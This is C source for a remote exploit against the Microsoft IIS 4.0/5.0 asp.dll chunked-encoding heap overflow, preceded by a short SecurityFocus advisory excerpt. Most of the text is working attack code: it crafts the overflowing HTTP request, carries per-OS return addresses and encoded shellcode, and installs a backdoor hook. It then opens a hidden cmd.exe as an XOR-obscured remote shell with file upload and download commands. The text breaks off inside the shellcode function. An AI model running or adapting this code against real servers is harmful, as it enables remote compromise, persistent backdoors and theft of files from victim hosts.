/*
source: http://www.securityfocus.com/bid/4485/info
A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services).
This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host.
Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.
A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.
*/
/*
aspcode.c ver1.0
iis4.0��iis5.0��iis5.1 asp.dll overflow program
copy by yuange <[email protected]> 2002.4.24
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#pragma comment(lib,"ws2_32")
//#define RETEIPADDR eipwin2000
#define FNENDLONG 0x08
#define NOPCODE 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
#define RETEIPADDRESS 0x468
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 14
#define DATABASE 0x61
#define DATAXORCODE 0x55
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define MCBSIZE 0x8
#define MEMSIZE 0xb200
#define SHELLPORT 0x1f90 //0x1f90=8080
#define WEBPORT 80
void shellcodefnlock();
void shellcodefnlock2();
void shellcodefn(char *ecb);
void shellcodefn2(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int
len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
void iiscmd(int fd,char *str);
void iisreset();
void iisdie();
void iishelp();
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0"
"\x09""asp.dll""\x0""HttpExtensionProc""\x0"
"\x09""msvcrt.dll""\x0""memcpy""\x0""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0""xordatareset""\x0"
"strend";
// char buff0[]="TRACK / HTTP/1.1\nHOST:";
char buff1[]="GET /";
char buff2[]="default.asp";
char *buff2add;
char buff3[]="?!!ko ";
char buff4[]=" HTTP/1.1 \nHOST:";
char buff5[]="\nContent-Type: application/x-www-form-urlencoded";
char buff51[]="\nTransfer-Encoding:chunked";
char buff6[]="\nContent-length: 2147506431\r\n\r\n"; //
0x80000000+MEMSIZE-1
char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff
char buff7[]=
"\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
char buff11[]=
"\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01";
char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";
/*
char
buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01";
char
buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01";
char
buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01";
char
buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01";
char
buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01";
char
buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01";
*/
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
char *eipexceptwin2000add;
char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ;
ret address
char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ;
ret address
char eipexceptwin2000[]="\x80\x70\x97\x74";
// char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78";
// call ebx address
char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78";
char eipexceptwin2000sp2[]="\x02\xbc\x01\x78";
// char eipexceptwin2000[]="\x0B\x08\x5A\x68";
// char eipexceptwin2000[]="\x32\x8d\x9f\x74";
char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ;
ret address
// char eipexceptwinnt[] ="\x2e\x01\x01\x78";
// call esi address
// char eipexcept2[]="\xd0\xae\xdc\x77"; //
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[BUFFSIZE];
char shellcodebuff2[BUFFSIZE];
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong,buff2long,shelladd,packlong;
int i,j,k,l,strheadlong;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange 2002.4.24.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n",
argv[0]);
buff2add=buff2;
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i<strlen(recvbuff);++i){
if(recvbuff[i]!=' ') break;
}
server=recvbuff;
if(i<strlen(recvbuff)) server+=i;
fprintf(stderr,"\n please enter the .asp filename:");
gets(shellcodebuff);
for(i=0;i<strlen(shellcodebuff);++i){
if(shellcodebuff[i]!=' ') break;
}
buff2add=shellcodebuff+i;
printf("\n .asp file name:%s\n",buff2add);
}
eipexceptwin2000add=eipexceptwin2000;
// printf("\n argc%d argv%s",argc,argv[5]);
if(argc>5){
if(strcmp(argv[5],"cn")==0) {
eipexceptwin2000add=eipexceptwin2000cn;
printf("\n For the cn system.\n");
}
if(strcmp(argv[5],"sp0")==0) {
eipexceptwin2000add=eipexceptwin20002;
printf("\n For the sp0 system.\n");
}
if(strcmp(argv[5],"msvcrt")==0) {
eipexceptwin2000add=eipexceptwin2000msvcrt;
printf("\n Use msvcrt.dll JMP to shell.\n");
}
if(strcmp(argv[5],"sp2")==0) {
eipexceptwin2000add=eipexceptwin2000sp2;
printf("\n Use sp2 msvcrt.dll JMP to shell.\n");
}
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
/*
if(argc>4){
offset=atoi(argv[4]);
}
// OVERADD+=offset;
// packlong=0x10000-offset+0x8;
if(offset<-0x20||offset>0x20){
fprintf(stderr,"\n offset error !offset -32 --- +32 .");
gets(buff);
exit(1);
}
*/
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
for(i=0;i<strlen(server);++i){
if(server[i]!=' ')
break;
}
if(i<strlen(server)) server+=i;
for(i=0;i+3<strlen(server);++i){
if(server[i]==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port
%d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct
sockaddr_in))!=0)
{
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
/*
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
*/
memset(buff,NOPCODE,BUFFSIZE);
/*
strcpy(buff,buff0);
if(argc>6) strcat(buff,argv[6]);
else strcat(buff,server);
strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n");
strcat(buff,buff1);
*/
strcpy(buff,buff1);
strheadlong=strlen(buff);
OVERADD+=strheadlong-1;
if(argc>2) buff2add=argv[2];
for(;;++buff2add){
temp=*buff2add;
if(temp!='\\'&&temp!='/') break;
}
// printf("\nfile:%s",buff2add);
buff2long=strlen(buff2add);
strcat(buff,buff2add);
// fprintf(stderr,"\n offset:%d\n",offset);
// offset+=strheadlong-strlen(buff1);
/*
for(i=0x404;i<=0x500;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
memcpy(buff+offset+i+4,eipexceptwin2000add,4);
}
if(argc>5){
if(strcmp(argv[5],"sp2")==0) {
memcpy(buff+offset+i,"\x58",1);
}
}
for(i=0x220;i<=0x380;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
memcpy(buff+offset+i+4,eipexceptwinnt,4);
}
for(i=0x580;i<=0x728;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
memcpy(buff+offset+i+4,eipexceptwinnt,4);
}
*/
// winnt 0x2cc or 0x71c win2000 0x130 or 0x468
// memcpy(buff+offset+i+8,exceptret,strlen(exceptret));
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(shellcodebuff2,NOPCODE,BUFFSIZE);
i=0x1000;
memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=BUFFSIZE;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
// k+=0x
memcpy(shellcodebuff,shellcodefnadd,k); //j);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(j=0;j<0x400;++j){
if(memcmp(str+j,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,j);
sendpacketlong=k+j;
for(k=0;k<=0x200;++k){
if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
}
for(j=0;j<sendpacketlong;++j){
temp=shellcodebuff[j];
// temp^=DATAXORCODE;
shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
++k;
shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
++k;
}
j=i+k;
j=j%8+3;
shellcodebuff2[i+j+k]=0;
// j=strlen(shellcodebuff2)%8+3;
for(j=0;j<=0xe000;j+=4){
strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32
// strcat(shellcodebuff2,eipexceptwin2000cn);
}
/*
strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\
x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\
x90");
for(j=0;j<=0xb00;j+=4){
strcat(shellcodebuff2,"\x90\x90\x90\x2d"); // 0x2d sub eax,num32
}
*/
// printf("\nbuff:%s",buff);
printf("\n shellcode long 0x%x\n",sendpacketlong);
if(argc>4&&strcmp(argv[4],"apache")==0){
strcat(buff," ");
}
else strcat(buff,buff3);
printf("\n packetlong:0x%x\n",sendpacketlong);
strcat(buff,buff4);
if(argc>6) strcat(buff,argv[6]);
else strcat(buff,server);
strcat(buff,buff5);
if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
else strcat(buff,shellcodebuff2);
// strcat(buff,buff51);
if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
printf("\n for %s system\n",argv[4]);
strcat(buff,buff61);
}
else strcat(buff,buff6);
// printf("\n send buff:\n%s",buff);
/*
i=strlen(buff);
memset(buff+i,'a',0xc000);
memset(buff+i+0xc000-strlen(buff7),0,1);
strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
*/
// strcpy(buff8,buff7);
/* temp=buff7[5];
temp-=offset*0x10;
buff7[5]=temp;
i=*(int *)(buff7+4)+2;
printf("\nSEH=0x%x\n",i);
*/
/*
for(i=0;i<8;++i){
temp=buff7[i];
printf("%2x",temp);
}
*/
/*
for(i=0;i<0xc000/0x10;++i){
strcat(buff,buff7);
}
*/
// printf("\nbuff=%s\n",buff);
// strcat(buff,"\r\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
// printf("buff:\n%s",buff+0x10000);
/*
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
*/
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
// buff[0x2000]=0;
fprintf(stderr,"\n send packet %d bytes.",j);
// gets(buff);
send(fd,buff,j,0);
buff7[0]=MCBSIZE;
j=MEMSIZE+0x10;
i=0;
if(argc>4&&strcmp(argv[4],"winxp")==0)
{
j=0x18;
i=8;
}
for(k=0;i<0xc000;i+=0x10){
if(i>=j) {
k=((i-j)/(MCBSIZE*8));
if(k<=6){
memcpy(buff7+0x8,buff10,8);
buff7[0x8]=buff8[k];
buff7[0xc]=buff9[k];
}
else memcpy(buff7,buff11,0x10);
}
memcpy(buff+i,buff7,0x10);
}
if(argc>4&&strcmp(argv[4],"apache")==0){
for(k=0xb000;k<=0xc000;k+=2)
{
memset(buff+k,0x0d,1);
memset(buff+k+1,0x0a,1);
}
buff[0xc000]=0;
// for(k=0;k<0x10;++k) send(fd,buff,0xc000,0);
// printf("\nbuff:%s\n",buff);
}
else send(fd,buff,0xc000,0);
k=0;
ioctlsocket(fd, FIONBIO, &k);
j=0;
while(j==0){
k=newrecv(fd,recvbuff,BUFFSIZE,0);
if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
xordatabegin=1;
fprintf(stderr,"\n ok!recv %d bytes\n",k);
recvbuff[k]=0;
// printf("\n recv:%s",recvbuff);
// for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int
*)(recvbuff+8+4*j));
k=-1;
j=1;
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
/*
for(i=0;i<strlen(SRLF);++i){
SRLF[i]^=DATAXORCODE;
}
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
*/
k=1;
l=0;
while(k!=0){
if(k<0){
l=0;
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iish",4)==0){
iishelp();
i=2;
}
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
i=2;
}
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
i=2;
}
if(memcmp(buff,"iiscmd",6)==0){
iiscmd(fd,buff+6);
i=2;
}
if(memcmp(buff,"iisreset",8)==0){
iisreset(fd,buff+6);
i=2;
}
if(memcmp(buff,"iisdie",6)==0){
iisdie(fd,buff+6);
i=2;
}
if(i==2)i=0;
else i=1;
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
// send(fd,SRLF,strlen(SRLF),0);
// fprintf(stderr,"%s",buff);
/*
for(i=0;i<k+2;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
// buff[i]^=DATAXORCODE;
}
send(fd,buff,k+2,0);
*/
newsend(fd,buff,k+2,0);
// send(fd,SRLF,strlen(SRLF),0);
}
k=newrecv(fd,buff,BUFFSIZE,0);
if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
xordatabegin=1;
k=-1;
}
if(k>0){
// fprintf(stderr,"recv %d bytes",k);
/*
if(xordatabegin==1){
for(i=0;i<k;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
}
*/
l=0;
buff[k]=0;
fprintf(stderr,"%s",buff);
}
else{
Sleep(20);
if(l<20) k=1;
++l;
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
jmp next1
getediadd: pop edi
mov esp,edi
and esp,0xfffff0f0
jmp next2
getshelladd:
push 0x01
mov eax,edi
inc eax
inc eax
inc eax
inc eax
inc eax
mov edi,eax
mov esi,edi
// sub sp,8
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
sub al,DATABASE
mov ah,al
lodsb
sub al,DATABASE
shl ah,4
add al,ah
// lea eax,ptr word [edx*4+al]
stosb
jmp looplock
next1: call getediadd
next2: call getshelladd
shell:
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void shellcodefn(char *ecb)
{ char Buff[SHELLBUFFSIZE+2];
int *except[3];
FARPROC memcpyadd;
FARPROC msvcrtdlladd;
FARPROC HttpExtensionProcadd;
FARPROC Aspdlladd;
FARPROC RtlEnterCriticalSectionadd;
FARPROC Ntdlladd;
FARPROC Sleepadd;
FARPROC GetLastErroradd;
FARPROC GetFileSizeadd;
FARPROC CreateFileAadd;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC procloadlib;
FARPROC apifnadd[1];
FARPROC procgetadd=0;
FARPROC writeclient;
FARPROC readclient;
HCONN ConnID;
FARPROC shellcodefnadd=ecb;
char *stradd,*stradd2,*dooradd;
int imgbase,fnbase,i,k,l,thedoor;
HANDLE libhandle;
int fpt; //libwsock32;
STARTUPINFO siinfo;
PROCESS_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;
int shelllocknum;
// unsigned char temp;
SECURITY_ATTRIBUTES sa;
_asm { jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
imgbase=0x77e00000;
_asm{
call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){
fnbase=*(int *)(imgbase+*(int
*)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int
*)(4+imgbase+*(int *)k)=='Acor')
{
k=*(WORD *)(l+l+imgbase+*(int
*)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int
*)(fnbase+0x1c));
procgetadd=k+imgbase;
break;
}
}
}
}
}
//����KERNEL32��DLLģ���ַ��API���� GetProcAddress��ַ
//ע�������������ҳ�治�����
if(procgetadd==0) goto die ;
i=stradd;
for(k=1;*stradd!=0;++k) {
if(*stradd==0x9) libhandle=procloadlib(stradd+1);
else apifnadd[k]=procgetadd(libhandle,stradd);
for(;*stradd!=0;++stradd){
}
++stradd;
}
++stradd;
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
k=stradd;
stradd=i;
thedoor=0;
i=0;
_asm{
jmp getdoorcall
getdooradd: pop dooradd;
mov l,esp
call getexceptretadd
}
if(i==0){
++i;
if(*(int *)ecb==0x90){
if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
i=0;
thedoor=1;
}
}
}
if(i!=0){
*(int *)(dooradd-0x0c)=HttpExtensionProcadd;
*(int *)(dooradd-0x13)=shellcodefnadd;
ecb=0;
_asm{
call getexceptretadd
}
i=ecb;
i&=0xfffff000;
ecb=i;
ecb+=0x1000;
for(;i<l;++i,++ecb)
{
if(*(int *)ecb==0x90){
if(*(int *)(ecb+8)==(int *)ecb){
if(*(int *)*(int *)(ecb+0x64)=='ok!!') break;
}
}
}
i=0;
_asm{
call getexceptretadd
}
i&=0xfffff000;
i+=0x1000;
for(;i<l;++i){
if(*(int *)i==HttpExtensionProcadd){
*(int *)i=dooradd-7;
// break;
}
}
// *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
}
writeclient= *(int *)(ecb+0x84);
readclient = *(int *)(ecb+0x88);
ConnID = *(int *)(ecb+8) ;
stradd=k;
_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
if(thedoor==0){
_asm{
mov eax,0xffffffff
mov dword ptr fs:[0],eax
}
}
stradd2=stradd;
stradd+=8;
k=0x20;
writeclient(ConnID,*(int *)(ecb+0x6c),&k,0);
k=8;
writeclient(ConnID,stradd+9,&k,0);
// Sleepadd(100);
shelllocknum=LOCKBIGNUM2;
if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int
*)(ecb+0x64)+4)=='notx') shelllocknum=0;
// iiscmd:
lockintvar1=shelllocknum%LOCKBIGNUM;
lockintvar2=lockintvar1;
iiscmd:
/*
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
*/
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
k=0;
// while(k==0)
// {
k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo,
&ProcessInformation);
// stradd+=8;
// }
Sleepadd(200);
// PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0
);
i=0;
while(1) {
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
if(lBytesRead>0) {
i=0;
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0) {
for(k=0;k<lBytesRead;++k){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[k]^=lockcharvar; // DATAXORCODE;
// Buff[k]^=DATAXORCODE;
}
writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
// Sleepadd(20);
}
}
else{
// Sleepadd(10);
l=0;
if(i<50){
l=1;
++i;
k=1;
lBytesRead=0;
}
while(l==0){
i=0;
lBytesRead=SHELLBUFFSIZE;
k=readclient(ConnID,Buff,&lBytesRead);
for(l=0;l<lBytesRead;++l){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[l]^=lockcharvar; // DATAXORCODE;
}
if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu
ff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
cmd.exe
stradd2=Buff+5;
Buff[lBytesRead]=0;
goto iiscmd;
}
if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Bu
ff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){
lBytesRead=0x0c;
writeclient(ConnID,stradd+0x11,&lBytesRead,0);
lockintvar1=shelllocknum%LOCKBIGNUM;
lockintvar2=lockintvar1;
lBytesRead=0;
}
if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu
ff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
cmd.exe
*(int *)(dooradd-0x0c)=0;
Sleepadd(0x7fffffff);
_asm{
mov eax,0
mov esp,0
jmp eax
}
}
if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]
==' ')
{
l=*(int *)(Buff+4);
//
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+
GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
);
k=GetLastErroradd();
i=0;
while(l>0){
lBytesRead=SHELLBUFFSIZE;
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k<lBytesRead;++k){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[k]^=lockcharvar; //
DATAXORCODE;
}
l-=lBytesRead;
// if(fpt>0)
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
// else Sleepadd(010);
}
// if(i>100) l=0;
}
else {
Sleepadd(0100);
++i;
}
if(i>10000) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else{
if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]
==' '){
//
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTIN
G,FILE_ATTRIBUTE_NORMAL,0);
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,
NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);
*(int *)Buff='ezis'; //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i<lBytesRead;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar; // DATAXORCODE;
}
writeclient(ConnID,Buff,&lBytesRead,0); //
HSE_IO_SYNC);
// Sleepadd(100);
i=0;
while(l>0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i<k;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM
;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar; //
DATAXORCODE;
}
i=0;
l-=k;
writeclient(ConnID,Buff,&k,0); //
HSE_IO_SYNC);
// Sleepadd(100);
//
k=readclient(ConnID,Buff,&lBytesRead);
}
else ++i;
if(i>100) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else l=1;
}
}
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
k=GetLastErroradd();
